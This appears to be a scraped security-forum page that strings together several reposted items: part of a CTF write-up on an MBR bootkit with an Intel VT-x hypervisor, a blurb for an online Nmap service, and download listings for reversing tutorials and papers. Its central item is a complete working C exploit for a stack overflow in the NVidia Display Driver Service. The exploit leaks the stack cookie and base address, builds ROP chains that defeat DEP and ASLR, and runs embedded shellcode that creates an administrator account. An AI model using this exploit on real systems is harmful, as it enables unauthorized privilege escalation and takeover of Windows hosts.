Obfuscation is complicated mainly by indirect function calls. At the very beginning AX registers the address of a function, which scans a specific table (containing function indexes and related offsets) to get the offset of a function to be called. After the function is fulfilled, the control is returned right after the function index constant (return address + 2). Function table in MBR MBR obfuscation algorithm MBR code is pretty simple: Retrieves hard drive features. Reads original MBR from the hidden file system. Replaces our MBR with original MBR at the 0x7c00 address. Reads and decrypts a hypervisor loader from the file system. Reads and decrypts a hypervisor body from the file system. Prepares parameters and passes control to the hypervisor loader. It should be mentioned that a set of bytes of Bochs BIOS was used for encryption of the hypervisor loader and body. It makes the program system-specific, because it runs correctly only on the Bochs emulator. We decided to use this method for several reasons. Firstly, debugging of Intel VT-x hardware virtualization is possible only on a real machine or using Bochs 2.4.5 or later (so we are already tied to this emulator). Secondly, we didn't want the participants to find encryption keys in the program and decrypt all the hypervisor parts using the static analysis without the debugger. Thirdly, this method prevents users from damaging systems on real machines. To help the participants, we had published information that they would need Bochs emulator with a working OS image to solve one of the tasks in advance. VMX Loader Hardware virtualization is not a new term. It started to spread in 2006 – 2007 when the most well-known CPU developers (Intel and AMD) released processors, which could support related instruction sets. Details on the virtual machine monitor will be provided in the next section. This section will touch upon the methods how to prepare the system for the hardware hypervisor. As it was mentioned above, it is possible to debug an application, which uses Intel VT-x virtualization, only on real machine or using Bochs 2.4.5 or above, but it is not the only problem. The default emulator build does not support hardware virtualization. That is why we had to compile our own build of Bochs and provide a link to it in the first hint to the task. The main goal of the hypervisor loader is to move the hypervisor’s body above the first megabyte and transfer control to its entry point. However, it carries out some non-trivial operations, which will be covered below. There are several input parameters including a base address, which is used as a code segment base. It is set by a far jump. Then the CPUID instruction checks that code is executed on the Intel system (zero function) and that hardware virtualization is supported by the processor (first function). Let’s take a closer look. Firstly, we call CPUID with value 1 in the EAX register. After the execution, the fifth bit of the ECX register (VMX flag) should be checked. If it is set, then hardware virtualization is supported. To check if virtualization is blocked on the early boot stages (BIOS), we need to read 0x3A MSR register. If the first bit of the EAX register is set after RDMSR instruction execution and the second bit is clear then virtualization is blocked. Then the loader calls a function, which reads the system memory map. This is achieved by calling interrupt 0x15 in the cycle with the 0xE820 value in the EAX register. That’s how the buffer is filled with records of memory regions. Then the memory map is checked for a free area suitable for the monitor body. If such a memory is found, it is marked as reserved. To move monitor body above the first megabyte, we need to switch the processor from a real mode to a protected or long mode. We decided to switch directly to the long mode as the hypervisor body works in it. We need to satisfy several conditions: prepare paging structures (PML4, PDPT, a number of PDs for 2MB pages), set PAE bit in the CR4 register, load the PML4 address to the CR3 register, set up GDTR with the long-mode segment registers, set the LMA bit in the MSR EFER register and set the PG and PE bits in the CR0 register. After these operations, we should make a far jump to switch the processor to the long mode. We noticed at this moment that the IDA Pro 6.1 debugger has a bug, which prevents it from calculating a correct far address, and it shows users some garbage data (this bug is fixed in IDA 6.3). It seems that IDA does not use register values from the Bochs debugger and makes wrong calculations by itself. That is why we recommended the participants to use the built-in Bochs debugger. The last step is to copy the body to the destination address and transfer control to the entry point. VMX Hypervisor Specifically for this task we wrote a thin hypervisor, which: Enters the VMX-root mode. Sets the VMCS structure to start the guest system in the real mode starting from the 0x7c00 address. Sets up guest exit handlers. Starts a guest by executing the VMLAUNCH instruction. The main goal of a participant is to find a guest system exit handler and analyze its code. Flag Obtaining the virtual machine exit handler, a participant came to the final stretch, and only a small task was needed to be solved. It is obvious from handler's code that if the CPUID instruction causes an exit and the EIP register contains a specific value then the handler creates an array (32 bytes) from the values of the registers EAX, ECX, EDX, EBX, ESI, EDI, ESP, EBP and then this array is checked for validity. The handler inserts vector (x_0,…,x_31 ) to the set of equations of the following type: If the equality is satisfied then the vector is valid and used as a key for buffer decryption. Therefore, a participant needs to solve a set of 32 equations with 32 variables. The only thing that complicates the analysis is that the validation algorithm uses a floating point unit (FPU) instruction set. There is one more (final) MBR in the encrypted buffer which contains a plaintext flag. This bootstrap substitutes the original MBR, and its goal is to display the flag on the screen. Example of a displayed flag Test application Specifically for testing, we have developed an application, which allocates memory to a given address, writes CPUID and a few other instructions with regard to a specific offset (address + offset = the needed EIP value), sets up registers and passes control to the given address. Therefore, when the CPUID instruction is carried out, the hypervisor takes control over, checks the register values, and reboots the system displaying the flag on the screen. Example of a test application Conclusion Developing this application, we wanted to create something unusual, a program which would be interesting for the whole team, because to solve this task, the participants needed to have skills in Win32 reverse engineering, analysis of MBR executed in the real mode, encryption and obfuscation algorithms analysis. This task required both static and dynamic analyses. The participants needed to have basic knowledge of hardware virtualization and assembler x86-64; to use their mathematical skills to obtain the flag. We really hope that we managed to interest both the participants and the readers of this review! From the authors We decided to write this task three weeks before the start of the qualifications and were absolutely sure that would finish very soon, but our expectations were not met. We had finished the task just a few hours before PHDays CTF Quals started and did not have any time to test it or fix the bugs. We were only sure that it was possible to obtain the flag, but the operating system ran not so well in the virtual environment. It displayed blue screens of death from time to time and didn't want to boot after resetting the system. While writing this article, we had some time to fix the bugs and release a more stable task. Unfortunately, this time was not enough either to regulate the operating system. Follow the links to download the last version of the task and watch the video demonstrating the task and test application operation. Thanks to everybody! Max Grigoryev, Sergey Kovalev, Positive Research Sursa: Positive Research Center: PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)

[h=1]ScanPlanner : NMAP now Online[/h]by Black on December 27, 2012 As we know most of the services are going on cloud or software as services, ScanPlanner is an expample of those sites. We can use NMAP free for online scanning. ScanPlanner is the easiest, fastest way to run NMAP scans and tests from the web. Schedule and track your network scans and vulnerability tests with our intuitive online interface. ScanPlanner is both free and paid services as per our need we can use it. We can schedule your regular network scans as frequently as you like and quickly compare results with you scan history. But One-pass scans are always free. For our Professional Tools suite, “pay as you go” plan means paying only for what you need. Plans start as low as $9.95 per month. Graphic, data-rich reports alert you to important changes in your network. Professional tool suite helps you assess risks and vulnerabilities, as well as suggested action. There are lot of benifites of useing these sevices live infra, support, and other Operating system dependencies but there are also risks involved in using these services. [h=3]Click here to read nore or use ScanPlanner[/h] Sursa: http://www.pentestit.com/scanplanner-nmap-online/

NVidia Display Driver Buffer Overflow Authored by Peter Winter-Smith This is an exploit for a stack buffer overflow in the NVidia Display Driver Service. The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability. /* NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 - Bypass DEP + ASLR + /GS + CoE ============================================================= (@peterwintrsmith) Hey all! Here is an exploit for an interesting stack buffer overflow in the NVidia Display Driver Service. The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability. The buffer overflow occurs as a result of a bad memmove operation, with the stack layout effectively looking like this: [locals] [received-data] [response-buf] [stack cookie] [return address] [arg space] [etc] The memmove copies data from the received-data buffer into the response-buf buffer, unchecked. It is possible to control the offset from which the copy starts in the received-data buffer by embedding a variable length string - which forms part of the protocol message being crafted - as well as the number of bytes copied into the response buffer. The amount of data sent back over the named pipe is related to the number of bytes copied rather than the maximum number of bytes that the buffer is able to safely contain, so it is possible to leak stack data by copying from the end of the received-data buffer, through the response-buf buffer (which is zeroed first time round, and second time round contains whatever was in it beforehand), right to the end of the stack frame (including stack cookie and return address). As the entire block of data copied is sent back, the stack cookie and nvvsvc.exe base can be determined using the aforementioned process. The stack is then trashed, but the function servicing pipe messages won't return until the final message has been received, so it doesn't matter too much. It is then possible to exploit the bug by sending two further packets of data: One containing the leaked stack cookie and a ROP chain dynamically generated using offsets from the leaked nvvsvc.exe base (which simply fills the response-buf buffer when this data is echoed back) and a second packet which contains enough data to trigger an overwrite if data is copied from the start of the received-data buffer into the response-buf (including the data we primed the latter to contain - stack cookie and ROP chain). Allowing the function to then return leads to execution of our ROP chain, and our strategically placed Metasploit net user /add shellcode! We get continuation of execution for free because the process spins up a thread to handle each new connection, and there are no deadlocks etc. I've included two ROP chains, one which works against the nvvsvc.exe running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers from the Dell site, and one which works against the latest version of the drivers for the same card, from: http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m http://www.geforce.co.uk/drivers/results/54709 Hope you find this interesting - it's a fun bug to play with! - Sample Session - C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Peter The command completed successfully. C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** [@peterwintrsmith] - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - Usage: nvvsvc_expl.exe <ip>|local !! If exploiting remotely, create a session with the target using your domain credentials !! Command: net use \\target.ip\ipc$ /u:domain\user password C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** [@peterwintrsmith] - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - Action 1 of 9: - CONNECT Action 2 of 9: - CLIENT => SERVER Written 16416 (0x4020) characters to pipe Action 3 of 9: - SERVER => CLIENT Read 16504 (0x4078) characters from pipe Action 4 of 9: Building exploit ... => Stack cookie 0xe2bad48dd565: => nvvsvc.exe base 0x13f460000: Action 5 of 9: - CLIENT => SERVER Written 16416 (0x4020) characters to pipe Action 6 of 9: - SERVER => CLIENT Read 16384 (0x4000) characters from pipe Action 7 of 9: - CLIENT => SERVER Written 16416 (0x4020) characters to pipe Action 8 of 9: - SERVER => CLIENT Read 16896 (0x4200) characters from pipe Action 9 of 9: - DISCONNECT C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Peter r00t The command completed successfully. */ #include <stdio.h> #include <Windows.h> enum EProtocolAction { ProtocolAction_Connect = 0, ProtocolAction_Receive, ProtocolAction_Send, ProtocolAction_Disconnect, ProtocolAction_ReadCookie, }; typedef struct { EProtocolAction Action; PBYTE Buf; DWORD Length; } ProtocolMessage; const int GENERIC_BUF_LENGTH = 0x10000; #define WriteByte(val) {buf[offs] = val; offs += 1;} #define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} #define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} #define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} #define BufRemaining() (sizeof(buf) - offs) DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) { DWORD dwWritten = 0; if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) return dwWritten; return 0; } DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) { DWORD dwRead = 0, dwAvailable = 0; if(bTimeout) { for(DWORD i=0; i < 30; i++) { if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) goto Cleanup; if(dwAvailable) break; Sleep(100); } if(!dwAvailable) goto Cleanup; } if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) goto Cleanup; Cleanup: return dwRead; } HANDLE EstablishPipeConnection(char *pszPipe) { HANDLE hPipe = CreateFileA( pszPipe, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL ); if(hPipe == INVALID_HANDLE_VALUE) { return NULL; } return hPipe; } BYTE *BuildMalicious_LeakStack() { static BYTE buf[0x4020] = {0}; UINT offs = 0; WriteWord(0x52); for(UINT i=0; i<0x2000; i++) WriteWord(0x41); WriteWord(0); WriteDword(0); WriteDword(0x4078); WriteDword(0x41414141); WriteDword(0x41414141); WriteDword(0x41414141); WriteDword(0x41414141); WriteDword(0x41414141); return buf; } BYTE *BuildMalicious_FillBuf() { static BYTE buf[0x4020] = {0}; UINT offs = 0; WriteWord(0x52); WriteWord(0); // string WriteDword(0); WriteDword(0x4000); while(BufRemaining()) WriteDword(0x43434343); return buf; } BYTE *BuildMalicious_OverwriteStack() { static BYTE buf[0x4020] = {0}; UINT offs = 0; WriteWord(0x52); WriteWord(0); // string WriteDword(0); WriteDword(0x4340); // enough to copy shellcode too while(BufRemaining()) WriteDword(0x42424242); return buf; } int main(int argc, char* argv[]) { DWORD dwReturnCode = 1, dwBytesInOut = 0; HANDLE hPipe = NULL; static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0}; printf( " ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **\n" " [@peterwintrsmith]\n" " - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -\n" ); if(argc < 2) { printf("\tUsage: %s <ip>|local\n\n", argv[0]); printf( " !! If exploiting remotely, create a session with the target using your domain credentials !!\n" "\tCommand: net use \\\\target.ip\\ipc$ /u:domain\\user password\n" ); goto Cleanup; } memset(rgReadBuf, 0, sizeof(rgReadBuf)); ProtocolMessage rgConvoMsg[] = { {ProtocolAction_Connect, NULL, 0}, {ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020}, {ProtocolAction_Receive, {0}, 0x4200}, {ProtocolAction_ReadCookie, {0}, 0}, {ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020}, {ProtocolAction_Receive, {0}, 0x4000}, {ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020}, {ProtocolAction_Receive, {0}, 0x4200}, {ProtocolAction_Disconnect, NULL, 0}, }; DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; BOOL bTryAgain = FALSE; char szPipe[256] = {0}; if(stricmp(argv[1], "local") == 0) strcpy(szPipe, "\\\\.\\pipe\\nvsr"); else sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); while(i < dwNumberOfMessages) { printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); switch(rgConvoMsg[i].Action) { case ProtocolAction_Connect: printf(" - CONNECT\n"); hPipe = EstablishPipeConnection(szPipe); if(!hPipe) { printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); goto Cleanup; } break; case ProtocolAction_Disconnect: printf(" - DISCONNECT\n"); CloseHandle(hPipe); hPipe = NULL; break; case ProtocolAction_Send: printf(" - CLIENT => SERVER\n"); if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) { printf("!! Error writing to pipe\n"); goto Cleanup; } printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); break; case ProtocolAction_Receive: printf("\t - SERVER => CLIENT\n"); if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) { printf("!! Error reading from pipe (at least, no data on pipe)\n"); goto Cleanup; } printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); break; case ProtocolAction_ReadCookie: // x64 Metasploit cmd/exec: // "net user r00t r00t00r! /add & net localgroup administrators /add" // exitfunc=thread char pb_NetAdd_Admin[] = "" "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00"; printf("Building exploit ...\n"); unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); printf("\t\t => Stack cookie 0x%x%x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; // Perform some limited fingerprinting (my default install version, vs latest at time of testing) switch(uiRetnAddress & 0xfff) { case 0x640: // 04/11/2011 05:19 1,640,768 nvvsvc.exe [md5=3947ad5d03e6abcce037801162fdb90d] { uiBase = uiRetnAddress - 0x4640; printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); // Param 1: lpAddress [r11 (near rsp) into rcx] pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn pRopChain[2] = 0; // Padding pRopChain[3] = 0; // ... pRopChain[4] = 0; // ... pRopChain[5] = 0; // ... pRopChain[6] = 0; // ... pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn pRopChain[10] = 0; // Padding pRopChain[11] = 0; // ... pRopChain[12] = 0; // ... pRopChain[13] = 0; // ... pRopChain[14] = 0; // ... pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn // Param 4: lpflOldProtect [r9 - already points at writable location] pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) memcpy(pRopChain + 22, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin)); } break; case 0xa11: // 01/12/2012 05:49 890,216 nvvsvc.exe [md5=3341d2c91989bc87c3c0baa97c27253b] { uiBase = uiRetnAddress - 0x3a11; printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); // Param 1: lpAddress [r11 (near rsp) into rcx] pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn pRopChain[2] = 0; // Padding ... pRopChain[3] = 0; // ... pRopChain[4] = 0; // ... pRopChain[5] = 0; // ... pRopChain[6] = 0; // ... pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] pRopChain[9] = 0; // Padding ... // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn pRopChain[13] = 0; // Padding ... pRopChain[14] = 0; // ... pRopChain[15] = 0; // ... pRopChain[16] = 0; // ... pRopChain[17] = 0; // ... pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn // Param 4: lpflOldProtect [r9 - already points at writable location] pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn pRopChain[21] = 0; // Padding ... pRopChain[22] = 0; // ... pRopChain[23] = 0; // ... pRopChain[24] = 0; // ... pRopChain[25] = 0; // ... pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn memcpy(pRopChain + 28, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin)); } break; } break; } i++; } dwReturnCode = 0; Cleanup: if(hPipe) CloseHandle(hPipe); return dwReturnCode; } Sursa: NVidia Display Driver Buffer Overflow ? Packet Storm

A? Pune un screenshot.

Aveti si chat: https://rstforums.com/chat/ Sa ma anuntati daca e vreo problema cu el, e pus pe fuga.

https://rstforums.com/chat/

Silences Programming Tour with MASM32 [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Silence[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]Silences Programmings Tour - MASM32 (General Edition) - Programming and Coding - Tuts 4 You[/TD] [/TR] [/TABLE] In this series I will teach you how to code in MASM32. Everything is very well explained, each line, each word and each API. This tour is called "General Edition" simply because I will learn you general MASM32 programming. In the examples I will teach you how to code a simple messagebox up to a MP3 music player. Content: (including source) 1. Introduction, Setup & Skeleton of Exe 2. Our first MessageBox 3. Our first DialogBox 4. DialogBox in Detail 5. Default toolbar controls part 1 (RichEdit, Trackbar, Radiobutton & Checkbox) 6. Default toolbar controls part 2 (Progressbar & Tabs) 7. Default toolbar controls part 3 (Listbox) 8. Default DialogBoxes (Color, Font, Open, Save, Print, Page-Setup, Find-Text, Find-Replace) 9. Simple file management 10. Showing Bitmap image & Playing mp3 files 11. Windows Registry + Final words [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]161.41 MB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 07:21:57[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3430 Sursa: Silences Programming Tour with MASM32 / Programming / Coding / Downloads - Tuts 4 You

Software Testing and Binary Static Analysis [Analysis of computer software, malware] Author: Ralf Hund, Carsten Willems, Dennis Felsch, Andreas Fobian, Thorsten Holz A detailed understanding of the behavior of exploits and malicious software is necessary to obtain a comprehensive overview of vulnerabilities in operating systems or client applications, and to develop protection techniques and tools. To this end, a lot of research has been done in the last few years on binary analysis techniques to efficiently and precisely analyze code. Most of the common analysis frameworks are based on software emulators since such tools offer a fine-grained control over the execution of a given program. Naturally, this leads to an arms race where the attackers are constantly searching for new methods and techniques to detect such analysis frameworks in order to successfully evade analysis. In this paper, we focus on two aspects. As a first contribution, we introduce several novel mechanisms by which an attacker can delude an emulator. In contrast to existing detection approaches that perform a dedicated test on the environment and combine the test with an explicit conditional branch, our detection mechanisms introduce code sequences that have an implicitly different behavior on a native machine when compared to an emulator. Such differences in behavior are caused by the side-effects of the particular operations and imperfections in the emulation process that cannot be mitigated easily. Even powerful analysis techniques such as multi-path execution cannot analyze our detection mechanisms since the emulator itself is deluded. Motivated by these findings, we introduce a novel approach to generate execution traces. We propose to utilize the processor itself to generate such traces. Mores precisely, we propose to use a hardware feature called branch tracing available on commodity x86 processors in which the log of all branches taken during code execution is generated directly by the processor. Effectively, the logging is thus performed at the lowest level possible. We present implementation details for both Intel and AMD x86 CPUs and evaluate the practical viability and effectiveness of this approach. [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]884.68 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 07:20:43[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3429 Sursa: Using Processor Features for Binary Analysis / Software Testing and Binary Static Analysis / Downloads - Tuts 4 You

[h=3]Cryptography / Algorithms [ Theory and implementation of cryptographic algorithms... ][/h] [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Dima Grigoriev, Vladimir Shpilrain[/TD] [/TR] [TR] [TD=class: forumheader3]Description[/TD] [TD=class: forumheader3]We employ tropical algebras as platforms for several cryptographic schemes that would be vulnerable to linear algebra attacks were they based on “usual” algebras as platforms.[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3428 Sursa: Tropical Cryptography / Cryptography / Algorithms / Downloads - Tuts 4 You

[h=3]OllyDbg 2.xx Plugins [ Here you can find most of the plugins ever written for OllyDbg v2.x... ][/h] [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Ferrit[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] ferrit.rce©gmail.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]http://forum.tuts4you.com/topic/30532-ollyext/[/TD] [/TR] [/TABLE] OllyExt is a plugin for Olly 2.xx debugger. The main intention of this plugin is to provide the biggest anti-anti debugging features and bugfixes for Olly 2.xx. Updates will come... The currently supported protections are the following: - IsDebuggerPresent - NtGlobalFlag - HeapFlag - ForceFlag - CheckRemoteDebuggerPresent - OutputDebugString - CloseHandle - SeDebugPrivilege - BlockInput - ProcessDebugFlags - ProcessDebugObjectHandle - TerminateProcess - NtSetInformationThread - NtQueryObject - FindWindow - NtOpenProcess - Process32First - Process32Next - ParentProcess - GetTickCount - timeGetTime - QueryPerformanceCounter - ZwGetContextThread - NtSetContextThread - KdDebuggerNotPresent - KdDebuggerEnabled - NtSetDebugFilterState - ProtectDRX - HideDRX The currently supported bugfixes are the following: - Caption change - Kill Anti-Attach ( dll integrity check ) Requirements: - Microsoft Visual C++ 2010 Redistributable Package (x86) OS support: - WinXP x32 - WinXP WoW64 - Win7 x32 - Win7 WoW64 [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]46.85 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 15:16:19[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3392 Sursa: OllyExt 1.0 / OllyDbg 2.xx Plugins / Downloads - Tuts 4 You

[h=3]Hardware Hacking [ Hacking and/or reverse engineering of custom hardware... ][/h] [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Andy Davis[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] andy.davis©ngssecure.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]Security Testing Services & Compliance - NCC Group[/TD] [/TR] [/TABLE] Picture this scene, which incidentally happens thousands of times every day all around the world: Someone walks into a meeting room, sees a video cable and plugs it into their laptop. The other end of the cable is out of sight – it just disappears through a hole in the table. What is it connected to? Presumably the video projector bolted to the ceiling, but can it be trusted to just display their PowerPoint presentation? In this paper I will explain the circumstances in which display devices send data to their connected host and show that this data could potentially contain threats (which could compromise a laptop for example). I will describe video protocol data-structures, data-sequences and practical challenges. I will also explain how to build a hardware-based fuzzer, provide some example firmware fuzzing code, and describe some interesting findings from the fuzzing which has been undertaken so far. This paper discusses the security of video drivers which interpret and process data supplied to them by external displays, projectors and KVM switches. It covers all the main video standards, including VGA, DVI, HDMI and DisplayPort. This is a relatively new area of research and there is more research that could be performed in this area, so by summarising and sharing these resources, it is hoped that this will enable others to more quickly discover and investigate potential threats. [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]809.75 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 